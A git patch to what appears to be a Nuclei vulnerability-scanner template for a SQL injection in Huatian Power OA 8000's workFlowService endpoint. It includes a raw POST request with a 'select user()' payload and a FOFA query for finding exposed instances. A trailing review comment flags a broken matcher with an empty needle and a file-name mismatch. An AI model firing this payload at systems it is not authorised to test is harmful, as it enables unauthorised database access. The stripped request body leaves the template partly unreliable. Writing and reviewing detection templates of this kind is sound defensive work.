From 3698f0492d2788025a265822bee207b8c5ba44e4 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Fri, 1 Sep 2023 21:00:09 +0530
Subject: [PATCH] Update huatian-oa8000-buffalo-rce.yaml
---
.../other/huatian-oa8000-buffalo-rce.yaml | 30 +++++++++++--------
1 file changed, 17 insertions(+), 13 deletions(-)
diff --git a/http/vulnerabilities/other/huatian-oa8000-buffalo-rce.yaml b/http/vulnerabilities/other/huatian-oa8000-buffalo-rce.yaml
index 6fb1322c1f..5c18665984 100644
--- a/http/vulnerabilities/other/huatian-oa8000-buffalo-rce.yaml
+++ b/http/vulnerabilities/other/huatian-oa8000-buffalo-rce.yaml
@@ -1,30 +1,34 @@
-id: huatian-oa8000-buffalo-rce
+id: huatian-oa8000-sqli
info:
- name: Huatian OA8000 Buffalo - Remote Code Execution
+ name: Huatian Power OA 8000 workFlowService - SQL injection
author: SleepingBag945
severity: critical
- description: Huatian OA8000 Buffalo found to be vulnerable to Remote Code Execution vulnerability
+ description: |
+ There is a SQL injection vulnerability in the workFlowService interface of Huatian Power OA 8000 version, through which an attacker can obtain sensitive database information
+ reference:
+ - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E5%8D%8E%E5%A4%A9OA/%E5%8D%8E%E5%A4%A9%E5%8A%A8%E5%8A%9BOA%208000%E7%89%88%20workFlowService%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
metadata:
- max-request: 2
+ max-request: 1
verified: true
fofa-query: app="华天动力-OA8000"
- tags: huatian,oa,buffalo,rce
+ tags: huatian,oa,sqli
http:
- raw:
- |
- GET /OAapp/bfapp/buffalo/ HTTP/1.1
+ POST /OAapp/bfapp/buffalo/workFlowService HTTP/1.1
Host: {{Hostname}}
-
- - |
- POST /OAapp/bfapp/buffalo/ HTTP/1.1
- Host: {{Hostname}}
- Content-Type: application/x-www-form-urlencoded
+
+
+ getDataListForTree
+ select user()
+
matchers:
- type: dsl
dsl:
- - status_code_1 == 500 && contains(body_1,'Buffalo worker support POST only!') && contains(body_1,'net.buffalo.service.BuffaloWorker.validate')
- - status_code_2 == 500 && contains(body_2,'net.buffalo.service.NoSuchServiceException') && contains(body_2,'net.buffalo.service.BuffaloWorker.processRequest')
+ - 'status_code == 200'
+ - 'contains(content_type, "text/xml")'
+ - 'contains_all(body,"" ,"user()")'
condition: and
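Review bot: The last matcher, `contains_all(body,"" ,"user()")`, passes an empty string as its first needle, which every body contains, so as written the body check reduces to the literal `user()`, the same text the request sends on its `select user()` line. Any endpoint that answers 200 with `text/xml` and reflects the submitted expression (an echo or a verbose parser message) would then be reported as a critical SQL injection without the query having run. If the empty needle is a reply marker that was lost, restore it; otherwise simplify to `- 'contains(body, "user()")'`, and preferably assert on a value the database has to compute rather than on the expression itself. Separately, `id` becomes `huatian-oa8000-sqli` and the `rce` tag is dropped while the path stays `huatian-oa8000-buffalo-rce.yaml`, so the file should be renamed in the same commit to keep id-based and filename-based selection consistent.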